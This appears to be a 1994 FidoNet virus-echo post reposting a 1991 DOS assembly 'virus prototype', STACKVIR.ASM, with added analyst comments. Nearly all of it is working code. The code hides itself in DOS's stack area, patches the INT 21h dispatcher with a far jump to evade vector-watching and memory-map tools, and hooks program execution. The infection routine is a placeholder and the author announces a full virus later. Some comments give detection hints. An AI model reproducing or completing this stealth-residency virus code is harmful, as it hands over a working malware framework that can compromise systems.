;─ PVT.VIRII (2:465/65.4) ─────────────────────────────────────────────── PVT.VIRII ─
; Msg  : 22 of 54
; From : MeteO                    2:5030/136      Tue 09 Nov 93 09:13
; To   : - *.* -                                  Fri 11 Nov 94 08:10
; Subj : STACKVIR.ASM
;──────────────────────────────────────────────────────────────────────────────
;.RealName: Max Ivanov
;══════════════════════════════════════════════════════════════════════════════
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Информация о вирусах)
;* From : Graham Allen, 2:283/718 (06 Nov 94 16:43)
;* To   : Edwin Cleton
;* Subj : STACKVIR.ASM
;══════════════════════════════════════════════════════════════════════════════
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org
;▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
;▒                                                                          ▒
;▒                      V I R U S   P R O T O T Y P E                       ▒
;▒                                                                          ▒
;▒ Author   : Waleri Todorov, CICTT, (C)-Copyright 1991, All Rights Rsrvd   ▒
;▒ Date     : 25 Jan 1991 21:05                                             ▒
;▒ Function : Find the DOS stack and put itself into it. Then intercept DOS ▒
;▒            function EXEC and print 'Infect File'                         ▒
;▒                                                                          ▒
;▒                                                                          ▒
;▒ If you want to have fun with this program just run file STACK.COM        ▒
;▒ Don't worry, this is not a virus yet, just try to find it in memory      ▒
;▒ with PCTools and/or MAPMEM. If you can -> just erase the source - it is  ▒
;▒ useless for you. If you can't -> you don't have to look at it - it is too▒
;▒ difficult for you to understand it.                                      ▒
;▒ Best regards, Waleri Todorov                                             ▒
;▒                                                                          ▒
;▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

;-----------------------------------------------------------------------
; STACK.COM entry point (16-bit real-mode DOS, 1991 sample kept for
; analysis).  Syntax is MASM/TASM-style Intel (`offset`, `dword ptr`,
; `512d`), not NASM as the page's language tag says.  The assembler
; directives (org 100h, segment/model) are not in this listing; the
; offsets used below presume the usual COM layout starting at 100h.
;
; Flow: ask DOS for its data segment with INT 21h/AH=52h (returns ES:BX),
; then use AX as an "already resident?" probe.  The resident copy's
; INT 21h handler (Entry21) answers AH=52h with AX=1234h; real DOS
; leaves AX unrelated to that value, so a mismatch means "not installed".
;-----------------------------------------------------------------------
        mov     ah,52h                  ; DOS "Get List of Lists": ES = DOS data segment
        int     21h

        cmp     ax,1234h                ; marker returned only by the resident handler
        jne     Install                 ; not resident yet -> install

ReturnControl
        int     20h                     ; terminate; in this prototype "return control
                                        ; to the host file" is just program exit
;-----------------------------------------------------------------------
; Install: copy this 512-byte image into a hole carved out of DOS's own
; stack area, then patch DOS's INT 21h code with a 5-byte far JMP to it.
; In:   ES = DOS segment (from INT 21h/AH=52h at program start)
;       DS = CS = PSP segment (COM entry state)
; Uses: SearchDos   -> cs:[DosOff], cs:[Int21off]
;       SearchStack -> cs:[StackOff]  (and rewrites one word inside DOS)
; Clobbers: AX BX CX SI DI DS ES, flags.  The string instructions assume
; DF is clear; nothing in this listing executes CLD.
;
; Memory artifacts this leaves (what a kernel-integrity check sees):
;   * a far JMP (EAh + offset + segment) written inside DOS's INT 21h
;     dispatcher at DosSeg:DosOff,
;   * a 16-bit constant inside DOS decreased by 200h (SearchStack),
;   * 512 bytes of foreign code inside the DOS segment, below its stack.
; The interrupt vector itself is never touched.
;-----------------------------------------------------------------------
Install
        mov     ax,es                   ; ES = DOS segment returned by AH=52h
        mov     DosSeg,ax               ; remember it (DS == CS here, so this hits cs:DosSeg)
        mov     ds,ax                   ; DS -> DOS segment for the two scanners

        call    SearchDos               ; locate the INT 21h patch point
        call    SearchStack             ; locate the DOS stack constant and shrink it by 200h

        push    cs                      ; DS = ES = CS
        push    cs
        pop     ds
        pop     es

        ; Turn DosSeg:(StackOff & 0FFF0h) into a segment value, then subtract
        ; 10h so that offset 100h in the new segment maps onto the hole: the
        ; copy keeps its COM-style offsets (Entry21, Txt, ... stay valid).
        ; Everything is 16-bit arithmetic, as in the original.
        mov     ax,DosSeg
        mov     cl,4                    ; AX *= 16
        shl     ax,cl
        mov     bx,StackOff             ; value SearchStack left (new stack constant)
        and     bx,0FFF0h               ; paragraph-align it
        add     ax,bx                   ; address of the hole
        mov     cl,4                    ; AX /= 16 -> segment of the hole (SEG:0000)
        shr     ax,cl
        sub     ax,10h                  ; the hole now appears at SEG:100h
        mov     StackOff,ax             ; NOTE: StackOff now holds a SEGMENT, not an offset
        mov     es,ax                   ; ES -> new home
        mov     si,100h                 ; DS:SI = CS:100h (this image)
        mov     di,si                   ; ES:DI = hole:100h
        mov     cx,512d                 ; the whole program is 512 bytes
        rep     movsb                   ; copy it

        ; Author's note: living in DOS's stack area instead of a DOS buffer
        ; means PCTools/MAPMEM-style tools see no new allocation, and a tool
        ; that counts DOS buffers finds nothing changed.  An anti-debugger
        ; part was announced for a later release; none is present here.

        ; Patch DOS: write "JMP FAR Entry21" (EA lo hi seg) at DosSeg:DosOff.
        mov     di,DosOff               ; ES:DI -> patch point inside DOS's INT 21h code
        mov     ax,DosSeg
        mov     es,ax
        mov     al,0EAh                 ; opcode: JMP FAR ptr16:16
        stosb
        mov     ax,offset Entry21       ; target offset (valid because the copy sits at hole:100h,
        stosw                           ; presuming org 100h - directive not in this listing)
        mov     ax,StackOff             ; target segment = the hole
        stosw

        ; DOS itself now jumps into the resident copy; since the INT 21h
        ; vector is unchanged, vector-watching utilities show nothing and
        ; DOSEDIT keeps working (author's note).  Comparing the first bytes
        ; of DOS's dispatcher against a clean copy is what exposes the patch.
        inc     di                      ; skip 2 more bytes: DI = DosOff + 7
        inc     di
        mov     Int21off,di             ; re-entry point into DOS (same value SearchDos stored)
        jmp     ReturnControl           ; back to the host
; At the moment, ReturnControl just terminates the program via int 20h.
; In a later release of the full virus this subroutine was meant to
; return control to any host file (COM or EXE).
; These are the two scanner subroutines. All they do is scan the DOS segment
; for a few well-known byte sequences, then update some internal variables.
; Be patient when debugging this area!
;-----------------------------------------------------------------------
; SearchDos: scan the DOS segment from offset 0 for a fixed byte pattern
; (word 3A2Eh, byte 26h, two bytes skipped, byte 77h) and derive:
;   cs:[DosOff]   = offset of the pattern start (where Install writes
;                   the 5-byte far JMP)
;   cs:[Int21off] = DosOff + 7 (where the handler re-enters DOS)
; In:   cs:[DosSeg] set.
; Out:  DS = DOS segment; AX, SI clobbered; flags clobbered.
; The pattern is hard-wired for one particular DOS kernel build.  There is
; no bound on the scan: if the pattern never matches, SI wraps at 64K and
; the loop runs forever.  Every failed partial match rewinds SI to
; (previous start + 1) and resumes - that is what the dec si / sub si,2 /
; sub si,5 below compute.
;-----------------------------------------------------------------------
SearchDos
        mov     ax,cs:[DosSeg]
        mov     ds,ax                   ; DS:SI walks the DOS segment
        xor     si,si

Search1
        lodsw                           ; AX = word at DS:SI, SI += 2
        cmp     ax,3A2Eh                ; first two pattern bytes (2Eh 3Ah in memory)
        je      NextDos1
        dec     si                      ; SI = start + 1
        jmp     short Search1
NextDos1
        lodsb                           ; third byte
        cmp     al,26h
        je      LastDos
        sub     si,2                    ; SI = start + 1
        jmp     short Search1
LastDos
        inc     si                      ; skip two bytes
        inc     si
        lodsb                           ; sixth byte
        cmp     al,77h
        je      FoundDos
        sub     si,5                    ; SI = start + 1
        jmp     short Search1
FoundDos
        inc     si                      ; SI = start + 7
        mov     cs:[Int21off],si        ; DOS re-entry point
        sub     si,7                    ; SI = start
        mov     cs:[DosOff],si          ; patch point
        ret
<doc_update>
;-----------------------------------------------------------------------
; SearchStack: scan the DOS segment for the pattern (word 0CB8Ch, word
; 0D38Eh, byte 0BCh).  The word that follows the pattern is treated as a
; 16-bit constant inside DOS: it is decreased by 200h IN PLACE (the
; write goes through ES:DI, and ES is still the DOS segment here) and the
; decreased value is kept in cs:[StackOff].  Install later turns StackOff
; into the segment of the 512-byte hole this creates.
; In:   DS = ES = DOS segment (DS from SearchDos, ES from AH=52h).
; Out:  cs:[StackOff] = new value; one word of DOS modified;
;       AX, SI, DI, flags clobbered.
; Same hard-wired pattern and unbounded scan as SearchDos: no match means
; SI wraps at 64K and the loop never exits.
;-----------------------------------------------------------------------
SearchStack
        xor     si,si                   ; DS:SI = DOS segment, offset 0
Search2
        lodsw
        cmp     ax,0CB8Ch               ; first two bytes (8Ch CBh in memory)
        je      NextStack1
        dec     si                      ; SI = start + 1
        jmp     short Search2
NextStack1
        lodsw
        cmp     ax,0D38Eh               ; next two bytes (8Eh D3h)
        je      NextStack2
        sub     si,3                    ; SI = start + 1
        jmp     short Search2
NextStack2
        lodsb
        cmp     al,0BCh                 ; fifth byte
        je      FoundStack
        sub     si,4                    ; SI = start + 1
        jmp     short Search2
FoundStack
        mov     di,si                   ; ES:DI -> the word right after the pattern
        lodsw                           ; AX = that word
        sub     ax,200h                 ; 512 less
        stosw                           ; write it back into DOS at the same place
        mov     cs:[StackOff],ax        ; remember the new value
        ret
;-----------------------------------------------------------------------
; Entry21: resident INT 21h handler.  It is reached by the far JMP that
; Install wrote into DOS's dispatcher, not through the interrupt vector.
;   AH=52h  (Get List of Lists) -> answered here, DOS never sees it:
;           AX=1234h (presence marker checked at program start),
;           ES=DosSeg, BX=26h, then IRET.  DosSeg:0026h is a constant,
;           not read from DOS; presumably the List-of-Lists offset of the
;           DOS version this was written for - TODO confirm.
;   AX=4B00h (EXEC) -> call Infect, then continue into DOS.
;   anything else   -> continue into DOS.
; "Continue into DOS" is a far JMP through cs:[Int21off]; the 32-bit
; operand is Int21off (offset) immediately followed in memory by DosSeg
; (segment) - see the data block - so DOS resumes at DosOff+7, just past
; the patched bytes.
; Detection note: because the vector is untouched, the hook only shows up
; when the bytes at DOS's INT 21h entry are compared with a clean copy, or
; when AH=52h returns the 1234h marker in AX.
;-----------------------------------------------------------------------
Entry21                                 ; new INT 21h handler
        cmp     ah,52h                  ; Get List of Lists?
        jne     NextCheck

        mov     ax,1234h                ; presence marker for the installer's check
        mov     bx,cs:[DosSeg]
        mov     es,bx
        mov     bx,26h                  ; ES:BX = DosSeg:0026h
        iret                            ; AH=52h terminates here, back to caller

NextCheck
        cmp     ax,4B00h                ; EXEC (load and execute)?
        jne     GoDos
        call    Infect                  ; prototype: only prints a message
GoDos
        jmp     dword ptr cs:[Int21off] ; far jump into DOS at DosOff+7
                                        ; (segment word = DosSeg, stored right after Int21off)
;-----------------------------------------------------------------------
; Infect: placeholder for the infection routine.  Prints "Infect File"
; with DOS function 09h and returns; no file is touched in this prototype.
; Called from Entry21 on AX=4B00h, i.e. while already inside the INT 21h
; path, so DOS is re-entered with PUSHF + far CALL through cs:[Int21off]
; (the same offset:segment pair Entry21 jumps through), which mimics an
; INT and bypasses the vector and the patched entry.
; Preserves DS, DX, AX (the EXEC caller's DS:DX filename pointer and AX).
; Whatever DOS's 09h clobbers beyond that is not restored - note(review):
; not visible here, confirm against the targeted DOS version.
;-----------------------------------------------------------------------
Infect
        push    ds                      ; save the EXEC caller's registers
        push    dx
        push    ax

        push    cs                      ; DS = CS so DX can address Txt
        pop     ds
        mov     dx,offset Txt
        mov     ah,9                    ; DOS: print '$'-terminated string at DS:DX
CallDos
        pushf                           ; simulate INT 21h: push flags, then far call
        call    dword ptr cs:[Int21off] ; into DOS past the patch (DosOff+7); DOS's IRET pops the flags

        pop     ax
        pop     dx
        pop     ds
        ret
;-----------------------------------------------------------------------
; Resident variables.  ORDER MATTERS: Int21off immediately followed by
; DosSeg forms the 32-bit far pointer read by `jmp dword ptr cs:[Int21off]`
; (Entry21) and `call dword ptr cs:[Int21off]` (Infect).
;-----------------------------------------------------------------------
Int21off  dw 0                          ; offset in DOS where execution resumes after the patch (DosOff+7)
DosSeg    dw 0                          ; DOS segment (from INT 21h/AH=52h); also the segment half of the far pointer above
StackOff  dw 0                          ; after SearchStack: decreased stack constant; after Install: SEGMENT of the resident copy
DosOff    dw 0                          ; offset in DOS where the 5-byte far JMP is written (DosOff+7 == Int21off)
Txt       db 'Infect File$'             ; '$'-terminated message printed by Infect
;-+- FMail 0.96Γ
; + Origin: FidoNet * Mathieu Notéris * Brussels-Belgium-Europe (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; ■ The Me┬eO
;
;/Twx Windows image
;
;--- Aidstest Null: /Kill
; * Origin: ∙PVT.ViRII·main·board· / Virus Research labs. (2:5030/136)